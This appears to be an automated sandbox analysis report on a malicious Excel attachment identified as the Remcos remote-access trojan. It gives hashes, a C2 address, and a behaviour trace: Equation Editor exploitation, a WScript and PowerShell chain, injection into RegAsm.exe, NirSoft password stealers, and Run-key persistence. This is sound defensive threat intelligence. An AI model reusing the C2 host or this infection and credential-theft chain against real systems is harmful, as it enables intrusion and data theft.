remcos | 1a49ecab4926721e64c3ef58e9d567bef2d0af4bb8494ee2ef5fd56e713af5cd

Analysis

max time kernel
148s
max time network
128s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
19-03-2024 08:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

scanned Draft Copy.xls
Size

49KB
MD5

903d5012df813abb990f663da1af4c8a
SHA1

18115c32fca740c959e005493511bf3b6842becb
SHA256

1a49ecab4926721e64c3ef58e9d567bef2d0af4bb8494ee2ef5fd56e713af5cd
SHA512

103e9ccda54df1317ba8d14fa5189a54ca303ceff1707826e4b73bd614556a2c2053e486833be4ea09b54398f1f604be00118a39b2cf07d6538ff7c80e7b28e4
SSDEEP

1536:iX68xwcRZrCO+68f4Rdc4AdoOVOrAjtev:iX68ecfrCO+6pRdc4Ado7Am

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

buike0147.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-1C7Y8W
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/2476-356-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2476-355-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2476-404-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/984-346-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/984-343-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/984-369-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 10 IoCs

Processes:

resource	yara_rule
behavioral1/memory/984-346-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/984-343-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2476-356-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2476-355-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2020-361-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2020-362-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2020-363-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2020-364-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/984-369-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2476-404-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 6 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

25 2344 EQNEDT32.EXE
30 700 WScript.exe
32 700 WScript.exe
34 2560 powershell.exe
36 2560 powershell.exe
37 2560 powershell.exe
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
25	2344	EQNEDT32.EXE
30	700	WScript.exe
32	700	WScript.exe
34	2560	powershell.exe
36	2560	powershell.exe
37	2560	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\MACH.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 2560 set thread context of 3052	2560	powershell.exe	RegAsm.exe
PID 3052 set thread context of 984	3052	RegAsm.exe	RegAsm.exe
PID 3052 set thread context of 2476	3052	RegAsm.exe	RegAsm.exe
PID 3052 set thread context of 2020	3052	RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2344 EQNEDT32.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2344	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXEEXCEL.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1740 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

pid process

2912 powershell.exe
2560 powershell.exe
1916 powershell.exe
984 RegAsm.exe
984 RegAsm.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

RegAsm.exe

pid process

3052 RegAsm.exe
3052 RegAsm.exe
3052 RegAsm.exe
3052 RegAsm.exe

pid	process
1740	EXCEL.EXE

pid	process
2912	powershell.exe
2560	powershell.exe
1916	powershell.exe
984	RegAsm.exe
984	RegAsm.exe

pid	process
3052	RegAsm.exe
3052	RegAsm.exe
3052	RegAsm.exe
3052	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exeWINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	2020	RegAsm.exe
Token: SeShutdownPrivilege	1828	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

1740 EXCEL.EXE
1740 EXCEL.EXE
1740 EXCEL.EXE
1828 WINWORD.EXE
1828 WINWORD.EXE

pid	process
1740	EXCEL.EXE
1740	EXCEL.EXE
1740	EXCEL.EXE
1828	WINWORD.EXE
1828	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 2344 wrote to memory of 700	2344	EQNEDT32.EXE	WScript.exe
PID 2344 wrote to memory of 700	2344	EQNEDT32.EXE	WScript.exe
PID 2344 wrote to memory of 700	2344	EQNEDT32.EXE	WScript.exe
PID 2344 wrote to memory of 700	2344	EQNEDT32.EXE	WScript.exe
PID 1828 wrote to memory of 2572	1828	WINWORD.EXE	splwow64.exe
PID 1828 wrote to memory of 2572	1828	WINWORD.EXE	splwow64.exe
PID 1828 wrote to memory of 2572	1828	WINWORD.EXE	splwow64.exe
PID 1828 wrote to memory of 2572	1828	WINWORD.EXE	splwow64.exe
PID 700 wrote to memory of 2912	700	WScript.exe	powershell.exe
PID 700 wrote to memory of 2912	700	WScript.exe	powershell.exe
PID 700 wrote to memory of 2912	700	WScript.exe	powershell.exe
PID 700 wrote to memory of 2912	700	WScript.exe	powershell.exe
PID 2912 wrote to memory of 2560	2912	powershell.exe	powershell.exe
PID 2912 wrote to memory of 2560	2912	powershell.exe	powershell.exe
PID 2912 wrote to memory of 2560	2912	powershell.exe	powershell.exe
PID 2912 wrote to memory of 2560	2912	powershell.exe	powershell.exe
PID 2560 wrote to memory of 1916	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 1916	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 1916	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 1916	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 2560 wrote to memory of 3052	2560	powershell.exe	RegAsm.exe
PID 3052 wrote to memory of 984	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 984	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 984	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 984	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 984	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 984	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 984	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 984	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2476	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2476	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2476	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2476	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2476	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2476	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2476	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2476	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 1748	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 1748	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 1748	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 1748	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 1748	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 1748	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 1748	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2020	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2020	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2020	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2020	3052	RegAsm.exe	RegAsm.exe
PID 3052 wrote to memory of 2020	3052	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\scanned Draft Copy.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1740

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
